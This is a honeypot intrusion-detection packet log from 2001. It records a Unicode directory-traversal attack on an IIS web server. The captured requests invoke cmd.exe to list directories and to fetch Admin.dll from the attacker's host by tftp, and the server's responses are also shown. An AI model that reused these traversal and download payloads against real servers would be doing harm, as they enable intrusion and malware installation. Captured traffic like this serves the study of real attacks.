IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=26516 flags=0 offset=0 TTL=118 chksum=60418
TCP:  port=3888 -> dport: 80  flags=******S* seq=461005598
      ack=0 off=6 res=0 win=8192 urp=0 chksum=14553
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25198) [2001-09-18 10:17:15]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=55040 flags=0 offset=0 TTL=128 chksum=29334
TCP:  port=80 -> dport: 3888  flags=***A**S* seq=287934
      ack=461005599 off=6 res=0 win=8760 urp=0 chksum=53709
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25199) [2001-09-18 10:17:15]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=26772 flags=0 offset=0 TTL=118 chksum=11015
TCP:  port=3785 -> dport: 80  flags=*****R** seq=461004526
      ack=461004526 off=5 res=0 win=0 urp=0 chksum=64193
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25200) [2001-09-18 10:17:15]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=30868 flags=0 offset=0 TTL=119 chksum=55814
TCP:  port=3888 -> dport: 80  flags=***A**** seq=461005599
      ack=287935 off=5 res=0 win=8760 urp=0 chksum=59786
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25201) [2001-09-18 10:17:15]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=136 ID=31124 flags=0 offset=0 TTL=119 chksum=55462
TCP:  port=3888 -> dport: 80  flags=***AP*** seq=461005599
      ack=287935 off=5 res=0 win=8760 urp=0 chksum=41120
Payload:  length = 94

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64   m32/cmd.exe?/c+d
030 : 69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48   ir r HTTP/1.0..H
040 : 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65   ost: www..Connne
050 : 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A         ction: close..
----------------------------------------------------------------------------
--
#(2 - 25202) [2001-09-18 10:17:15]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=56064 flags=0 offset=0 TTL=128 chksum=28314
TCP:  port=80 -> dport: 3888  flags=***A**** seq=287935
      ack=461005695 off=5 res=0 win=8664 urp=0 chksum=59786
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25203) [2001-09-18 10:17:15]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=231 ID=56320 flags=0 offset=0 TTL=128 chksum=27867
TCP:  port=80 -> dport: 3888  flags=***AP*** seq=287935
      ack=461005695 off=5 res=0 win=8664 urp=0 chksum=38356
Payload:  length = 191

000 : 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D   HTTP/1.1 200 OK.
010 : 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F   .Server: Microso
020 : 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65   ft-IIS/4.0..Date
030 : 3A 20 54 75 65 2C 20 31 38 20 53 65 70 20 32 30   : Tue, 18 Sep 20
040 : 30 31 20 31 36 3A 30 30 3A 35 36 20 47 4D 54 0D   01 16:00:56 GMT.
050 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61   .Content-Type: a
060 : 70 70 6C 69 63 61 74 69 6F 6E 2F 6F 63 74 65 74   pplication/octet
070 : 2D 73 74 72 65 61 6D 0D 0A 56 6F 6C 75 6D 65 20   -stream..Volume 
080 : 69 6E 20 64 72 69 76 65 20 43 20 68 61 73 20 6E   in drive C has n
090 : 6F 20 6C 61 62 65 6C 2E 0D 0A 56 6F 6C 75 6D 65   o label...Volume
0a0 : 20 53 65 72 69 61 6C 20 4E 75 6D 62 65 72 20 69    Serial Number i
0b0 : 73 20 38 30 42 34 2D 38 39 43 41 0D 0A 0D 0A      s 80B4-89CA....
----------------------------------------------------------------------------
--
#(2 - 25204) [2001-09-18 10:17:15]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=260 ID=56576 flags=0 offset=0 TTL=128 chksum=27582
TCP:  port=80 -> dport: 3888  flags=***AP**F seq=288126
      ack=461005695 off=5 res=0 win=8664 urp=0 chksum=38130
Payload:  length = 220

000 : 20 44 69 72 65 63 74 6F 72 79 20 6F 66 20 43 3A    Directory of C:
010 : 5C 49 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73   \Inetpub\scripts
020 : 0D 0A 0D 0A 30 39 2F 31 38 2F 30 31 20 20 31 30   ....09/18/01  10
030 : 3A 35 33 61 20 20 20 20 20 20 20 20 3C 44 49 52   :53a        <DIR
040 : 3E 20 20 20 20 20 20 20 20 20 20 2E 0D 0A 30 39   >          ...09
050 : 2F 31 38 2F 30 31 20 20 31 30 3A 35 33 61 20 20   /18/01  10:53a  
060 : 20 20 20 20 20 20 3C 44 49 52 3E 20 20 20 20 20         <DIR>

070 : 20 20 20 20 20 2E 2E 0D 0A 20 20 20 20 20 20 20        ....       
080 : 20 20 20 20 20 20 20 20 32 20 46 69 6C 65 28 73           2 File(s
090 : 29 20 20 20 20 20 20 20 20 20 20 20 20 20 20 30   )              0
0a0 : 20 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20    bytes..        
0b0 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                   
0c0 : 20 20 32 2C 31 30 31 2C 30 32 32 2C 32 30 38 20     2,101,022,208 
0d0 : 62 79 74 65 73 20 66 72 65 65 0D 0A               bytes free..
----------------------------------------------------------------------------
--
#(2 - 25205) [2001-09-18 10:17:15]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=40084 flags=0 offset=0 TTL=118 chksum=46854
TCP:  port=3888 -> dport: 80  flags=*****R** seq=461005695
      ack=0 off=5 res=0 win=0 urp=0 chksum=28722
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25206) [2001-09-18 10:17:15]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=40340 flags=0 offset=0 TTL=118 chksum=46594
TCP:  port=3905 -> dport: 80  flags=******S* seq=461005740
      ack=0 off=6 res=0 win=8192 urp=0 chksum=14394
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25207) [2001-09-18 10:17:15]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=56832 flags=0 offset=0 TTL=128 chksum=27542
TCP:  port=80 -> dport: 3905  flags=***A**S* seq=288344
      ack=461005741 off=6 res=0 win=8760 urp=0 chksum=53140
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25208) [2001-09-18 10:17:15]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=40596 flags=0 offset=0 TTL=118 chksum=62726
TCP:  port=3888 -> dport: 80  flags=*****R** seq=461005695
      ack=461005695 off=5 res=0 win=0 urp=0 chksum=61752
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25209) [2001-09-18 10:17:15]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=43924 flags=0 offset=0 TTL=119 chksum=42758
TCP:  port=3905 -> dport: 80  flags=***A**** seq=461005741
      ack=288345 off=5 res=0 win=8760 urp=0 chksum=59217
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25210) [2001-09-18 10:17:15]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=191 ID=44180 flags=0 offset=0 TTL=119 chksum=42351
TCP:  port=3905 -> dport: 80  flags=***AP*** seq=461005741
      ack=288345 off=5 res=0 win=8760 urp=0 chksum=246
Payload:  length = 139

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74   m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33   ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64   .180 GET Admin.d
050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   ll c:\Admin.dll 
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50   :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D   /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F                  .Connnectio
----------------------------------------------------------------------------
--
#(2 - 25211) [2001-09-18 10:17:15]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=57344 flags=0 offset=0 TTL=128 chksum=27034
TCP:  port=80 -> dport: 3905  flags=***A**** seq=288345
      ack=461005892 off=5 res=0 win=8609 urp=0 chksum=59217
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25214) [2001-09-18 10:17:17]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=6038 flags=0 offset=0 TTL=118 chksum=31749
TCP:  port=3585 -> dport: 80  flags=*****R** seq=461002562
      ack=461002562 off=5 res=0 win=0 urp=0 chksum=2786
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25227) [2001-09-18 10:18:29]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=59649 flags=0 offset=0 TTL=128 chksum=24374
TCP:  port=80 -> dport: 3905  flags=***AP*** seq=288345
      ack=461005892 off=5 res=0 win=8609 urp=0 chksum=33293
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 32 3A 30 39 20 47 4D 54 0D 0A 43 6F 6E 74   :02:09 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25228) [2001-09-18 10:18:29]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=59905 flags=0 offset=0 TTL=128 chksum=24473
TCP:  port=80 -> dport: 3905  flags=***A***F seq=288700
      ack=461005892 off=5 res=0 win=8609 urp=0 chksum=58861
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25229) [2001-09-18 10:18:29]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=43478 flags=0 offset=0 TTL=118 chksum=43460
TCP:  port=3905 -> dport: 80  flags=*****R** seq=461005892
      ack=0 off=5 res=0 win=0 urp=0 chksum=28508
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25230) [2001-09-18 10:18:29]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=43734 flags=0 offset=0 TTL=118 chksum=43200
TCP:  port=2710 -> dport: 80  flags=******S* seq=467601707
      ack=0 off=6 res=0 win=8192 urp=0 chksum=38657
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25231) [2001-09-18 10:18:29]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=60929 flags=0 offset=0 TTL=128 chksum=23445
TCP:  port=80 -> dport: 2710  flags=***A**S* seq=362501
      ack=467601708 off=6 res=0 win=8760 urp=0 chksum=3246
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25232) [2001-09-18 10:18:29]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=43990 flags=0 offset=0 TTL=118 chksum=59332
TCP:  port=3905 -> dport: 80  flags=*****R** seq=461005892
      ack=461005892 off=5 res=0 win=0 urp=0 chksum=61341
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25233) [2001-09-18 10:18:30]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=41431 flags=0 offset=0 TTL=119 chksum=45251
TCP:  port=2710 -> dport: 80  flags=***A**** seq=467601708
      ack=362502 off=5 res=0 win=8760 urp=0 chksum=9323
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25234) [2001-09-18 10:18:30]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=191 ID=41687 flags=0 offset=0 TTL=119 chksum=44844
TCP:  port=2710 -> dport: 80  flags=***AP*** seq=467601708
      ack=362502 off=5 res=0 win=8760 urp=0 chksum=15886
Payload:  length = 139

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74   m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33   ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64   .180 GET Admin.d
050 : 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   ll d:\Admin.dll 
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50   :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D   /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F                  .Connnectio
----------------------------------------------------------------------------
--
#(2 - 25235) [2001-09-18 10:18:30]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=61441 flags=0 offset=0 TTL=128 chksum=22937
TCP:  port=80 -> dport: 2710  flags=***A**** seq=362502
      ack=467601859 off=5 res=0 win=8609 urp=0 chksum=9323
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25236) [2001-09-18 10:19:31]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=62978 flags=0 offset=0 TTL=128 chksum=21045
TCP:  port=80 -> dport: 2710  flags=***AP*** seq=362502
      ack=467601859 off=5 res=0 win=8609 urp=0 chksum=48429
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 33 3A 31 32 20 47 4D 54 0D 0A 43 6F 6E 74   :03:12 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25237) [2001-09-18 10:19:31]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=63234 flags=0 offset=0 TTL=128 chksum=21144
TCP:  port=80 -> dport: 2710  flags=***A***F seq=362857
      ack=467601859 off=5 res=0 win=8609 urp=0 chksum=8967
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25238) [2001-09-18 10:19:31]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=38410 flags=0 offset=0 TTL=118 chksum=48528
TCP:  port=2710 -> dport: 80  flags=*****R** seq=467601859
      ack=0 off=5 res=0 win=0 urp=0 chksum=52771
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25239) [2001-09-18 10:19:31]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=38666 flags=0 offset=0 TTL=118 chksum=48268
TCP:  port=4497 -> dport: 80  flags=******S* seq=473163564
      ack=0 off=6 res=0 win=8192 urp=0 chksum=45488
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25240) [2001-09-18 10:19:31]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=64002 flags=0 offset=0 TTL=128 chksum=20372
TCP:  port=80 -> dport: 4497  flags=***A**S* seq=424219
      ack=473163565 off=6 res=0 win=8760 urp=0 chksum=13894
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25241) [2001-09-18 10:19:31]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=38922 flags=0 offset=0 TTL=118 chksum=64400
TCP:  port=2710 -> dport: 80  flags=*****R** seq=467601859
      ack=467601859 off=5 res=0 win=0 urp=0 chksum=43137
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25242) [2001-09-18 10:19:31]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=42250 flags=0 offset=0 TTL=119 chksum=44432
TCP:  port=4497 -> dport: 80  flags=***A**** seq=473163565
      ack=424220 off=5 res=0 win=8760 urp=0 chksum=19971
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25243) [2001-09-18 10:19:31]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=191 ID=42506 flags=0 offset=0 TTL=119 chksum=44025
TCP:  port=4497 -> dport: 80  flags=***AP*** seq=473163565
      ack=424220 off=5 res=0 win=8760 urp=0 chksum=26533
Payload:  length = 139

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74   m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33   ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64   .180 GET Admin.d
050 : 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   ll e:\Admin.dll 
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50   :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D   /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F                  .Connnectio
----------------------------------------------------------------------------
--
#(2 - 25244) [2001-09-18 10:19:31]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=64514 flags=0 offset=0 TTL=128 chksum=19864
TCP:  port=80 -> dport: 4497  flags=***A**** seq=424220
      ack=473163716 off=5 res=0 win=8609 urp=0 chksum=19971
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25379) [2001-09-18 10:20:33]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=22020 flags=0 offset=0 TTL=128 chksum=62003
TCP:  port=80 -> dport: 4497  flags=***AP*** seq=424220
      ack=473163716 off=5 res=0 win=8609 urp=0 chksum=58819
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 34 3A 31 34 20 47 4D 54 0D 0A 43 6F 6E 74   :04:14 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25380) [2001-09-18 10:20:33]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=22276 flags=0 offset=0 TTL=128 chksum=62102
TCP:  port=80 -> dport: 4497  flags=***A***F seq=424575
      ack=473163716 off=5 res=0 win=8609 urp=0 chksum=19615
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25381) [2001-09-18 10:20:33]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=34110 flags=0 offset=0 TTL=118 chksum=52828
TCP:  port=4497 -> dport: 80  flags=*****R** seq=473163716
      ack=0 off=5 res=0 win=0 urp=0 chksum=59602
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25382) [2001-09-18 10:20:33]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=44 ID=34366 flags=0 offset=0 TTL=118 chksum=52568
TCP:  port=2154 -> dport: 80  flags=******S* seq=478595545
      ack=0 off=6 res=0 win=8192 urp=0 chksum=55255
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25383) [2001-09-18 10:20:33]  Honeypot Data out
IPv4: xx.xx.xx.xx -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=23556 flags=0 offset=0 TTL=128 chksum=60818
TCP:  port=80 -> dport: 2154  flags=***A**S* seq=486299
      ack=478595546 off=6 res=0 win=8760 urp=0 chksum=27116
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25384) [2001-09-18 10:20:33]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=34622 flags=0 offset=0 TTL=118 chksum=3165
TCP:  port=4497 -> dport: 80  flags=*****R** seq=473163716
      ack=473163716 off=5 res=0 win=0 urp=0 chksum=58586
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25385) [2001-09-18 10:20:33]  Honeypot Data
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=40 ID=41790 flags=0 offset=0 TTL=119 chksum=44892
TCP:  port=2154 -> dport: 80  flags=***A**** seq=478595546
      ack=486300 off=5 res=0 win=8760 urp=0 chksum=33193
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25386) [2001-09-18 10:20:33]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> xx.xx.xx.xx
      hlen=5 TOS=0 dlen=116 ID=42046 flags=0 offset=0 TTL=119 chksum=44560
TCP:  port=2154 -> dport: 80  flags=***AP*** seq=478595546
      ack=486300 off=5 res=0 win=8760 urp=0 chksum=47995
Payload:  length = 74

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 6C   5c../Admin.dll l
020 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A    HTTP/1.0..Host:
